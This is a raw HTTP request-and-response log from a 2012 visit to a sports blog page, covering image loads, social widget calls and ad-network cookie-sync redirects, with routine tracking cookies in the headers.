Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:09:46 GMT
Etag: &quot;226aed-727c-4ca2be548ca80&quot;
Accept-Ranges: bytes
Content-Length: 29308
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /pull_sync?ul_cb=1&pid=contextweb HTTP/1.1

Host: www.wtp101.com
GET /pull_sync?ul_cb=1&amp;pid=contextweb HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: tuuid=ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8
Set-Cookie: tuuid=ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e; path=/; expires=Wed, 19-Nov-2014 04:17:44 GMT; domain=.wtp101.com
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=537583&amp;ev=ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:44 GMT
GET /navigation/blogimages/basketball/crossoverchronicles.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:09:48 GMT
Etag: &quot;226af6-b7c1-4ca2be5674f00&quot;
Accept-Ranges: bytes
Content-Length: 47041
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /navigation/blogimages/college/crystalballrun.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:09:53 GMT
Etag: &quot;226b10-9bbd-4ca2be5b39a40&quot;
Accept-Ranges: bytes
Content-Length: 39869
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /navigation/blogimages/general/awfulannouncing.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:04 GMT
Etag: &quot;226b41-927e-4ca2be65b7300&quot;
Accept-Ranges: bytes
Content-Length: 37502
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /navigation/js/main.js?_=1353298664070 HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 02:30:11 GMT
Etag: &quot;226b96-703-4ca2d04e072c0&quot;
Accept-Ranges: bytes
Content-Length: 1795
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /navigation/images/logo.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:15 GMT
Etag: &quot;226b86-65c-4ca2be7034bc0&quot;
Accept-Ranges: bytes
Content-Length: 1628
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /plugins/like.php?api_key=&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df14098a00cc2166%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff2da6618592290a%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&node_type=link&width=90&font=arial&layout=button_count&colorscheme=light&action=like&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df14098a00cc2166%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff2da6618592290a%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;node_type=link&amp;width=90&amp;font=arial&amp;layout=button_count&amp;colorscheme=light&amp;action=like&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: b1iEJZ3wAdMxyOKAyvVpFg12U8RnfX8ufDi+ru2qkeY=
Date: Mon, 19 Nov 2012 04:17:44 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df170864bf4df4a%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff2da6618592290a%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&node_type=link&width=90&font=arial&layout=button_count&colorscheme=light&action=like&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df170864bf4df4a%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff2da6618592290a%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;node_type=link&amp;width=90&amp;font=arial&amp;layout=button_count&amp;colorscheme=light&amp;action=like&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: pfBfpO3e9xBz4C2c/ChF15Kb5GVO6aCuQquTBQc62LU=
Date: Mon, 19 Nov 2012 04:17:44 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /b?c1=8&c2=2101&c3=1234567891234567891&ns__t=1353298664761&ns_c=ISO-8859-1&c8=&c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26r%3Dhttp%253A%252F%252Fwww.88websitedesign.com%252Findex.php%253Fwebsite-design-and-development-services-web-company%253Dseo&c9=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;ns__t=1353298664761&amp;ns_c=ISO-8859-1&amp;c8=&amp;c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26r%3Dhttp%253A%252F%252Fwww.88websitedesign.com%252Findex.php%253Fwebsite-design-and-development-services-web-company%253Dseo&amp;c9=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dg.specificclick.net/?y=3&amp;t=h&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;r=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo
Cookie: UID=a2978d-195.159.219.9-1353298656; UIDR=1353298656
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:44 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /t.gif?_=1353298664242&count=horizontal&id=twitter-widget-0&lang=en&original_referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&size=m&text=__404__&url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&via=FenwayWest&type=share&twttr_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= HTTP/1.1

Host: p.twitter.com
GET /t.gif?_=1353298664242&amp;count=horizontal&amp;id=twitter-widget-0&amp;lang=en&amp;original_referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;size=m&amp;text=__404__&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;via=FenwayWest&amp;type=share&amp;twttr_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;twttr_widget=1&amp;twttr_hask=0&amp;twttr_li=0&amp;twttr_pid= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1352365724.html
HTTP/1.1 200 OK

Content-Type: image/gif
Etag: &quot;377d257f2d2e294916143c069141c1c5:1328738114&quot;
Last-Modified: Wed, 08 Feb 2012 21:55:14 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
Date: Mon, 19 Nov 2012 04:17:44 GMT
Connection: keep-alive
GET /navigation/blogimages/hockey/puckdrunklove.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:11 GMT
Etag: &quot;226b66-12fd7-4ca2be6c642c0&quot;
Accept-Ranges: bytes
Content-Length: 77783
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /1/urls/count.json?url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&callback=twttr.receiveCount HTTP/1.1

Host: cdn.api.twitter.com
GET /1/urls/count.json?url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;callback=twttr.receiveCount HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1352365724.html
HTTP/1.1 200 OK

Content-Type: application/javascript;charset=utf-8
Last-Modified: Mon, 19 Nov 2012 04:07:23 GMT
Content-Encoding: gzip
Content-Length: 122
Server: tfe
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=247
Expires: Mon, 19 Nov 2012 04:21:51 GMT
Date: Mon, 19 Nov 2012 04:17:44 GMT
Connection: keep-alive
GET /do-association?return=ctxweb&can=10 HTTP/1.1

Host: matcher-cwb.bidder7.mookie1.com
GET /do-association?return=ctxweb&amp;can=10 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: id=422312932908019; mdata=1|422312932908019|1353298663; OAX=4rS/HFCpsucACSed
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Expires: Fri, 30 Oct 1998 14:19:41 GMT
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Content-Length: 43
Keep-Alive: timeout=1, max=869
Connection: Keep-Alive
GET /bh/rtset?do=add&pid=537583&ev=ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=537583&amp;ev=ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=3; wf=0; pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-36-134-38
Date: Mon, 19 Nov 2012 04:17:44 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:44 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583.ae5d262d-5b10-4dca-9fe0-2db3b63bfc3e.0.0.1353298664827|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:44 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /navigation/images/football.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:15 GMT
Etag: &quot;226b80-15bd-4ca2be7034bc0&quot;
Accept-Ranges: bytes
Content-Length: 5565
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /navigation/images/hockey.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:15 GMT
Etag: &quot;226b83-137f-4ca2be7034bc0&quot;
Accept-Ranges: bytes
Content-Length: 4991
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /navigation/images/college.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:14 GMT
Etag: &quot;226b7c-1359-4ca2be6f40980&quot;
Accept-Ranges: bytes
Content-Length: 4953
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /navigation/images/baseball.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:13 GMT
Etag: &quot;226b75-15a4-4ca2be6e4c740&quot;
Accept-Ranges: bytes
Content-Length: 5540
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /navigation/images/basketball.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:14 GMT
Etag: &quot;226b78-156a-4ca2be6f40980&quot;
Accept-Ranges: bytes
Content-Length: 5482
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /?y=3&t=h&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&r=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

Host: dg.specificclick.net
GET /?y=3&amp;t=h&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;r=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html;charset=ISO-8859-1
Server: WebStar 1.0
Set-Cookie: ug=574_Xq6rBC1KXB; Domain=.specificclick.net; Expires=Sat, 18-Nov-2017 04:17:44 GMT; Path=/
P3P: CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI NAV&quot;
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Transfer-Encoding: chunked
Date: Mon, 19 Nov 2012 04:17:44 GMT
nnCoection: close
GET /cxweb_sync HTTP/1.1

Host: t.pswec.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8
P3P: CP=&quot;NON DSP ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONo OUR UNRo IND ONL UNI PUR COM NAV INT DEM STA PRE&quot;
Set-Cookie: tuuid=ee1c69d9-2586-494e-a996-a504e533528a; path=/; expires=Mon, 20-Nov-2017 04:17:44 GMT; domain=.pswec.com
Location: /cxweb_sync?ul_cb=1&amp;
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:44 GMT
GET /navigation/images/general.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:15 GMT
Etag: &quot;226b81-1454-4ca2be7034bc0&quot;
Accept-Ranges: bytes
Content-Length: 5204
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
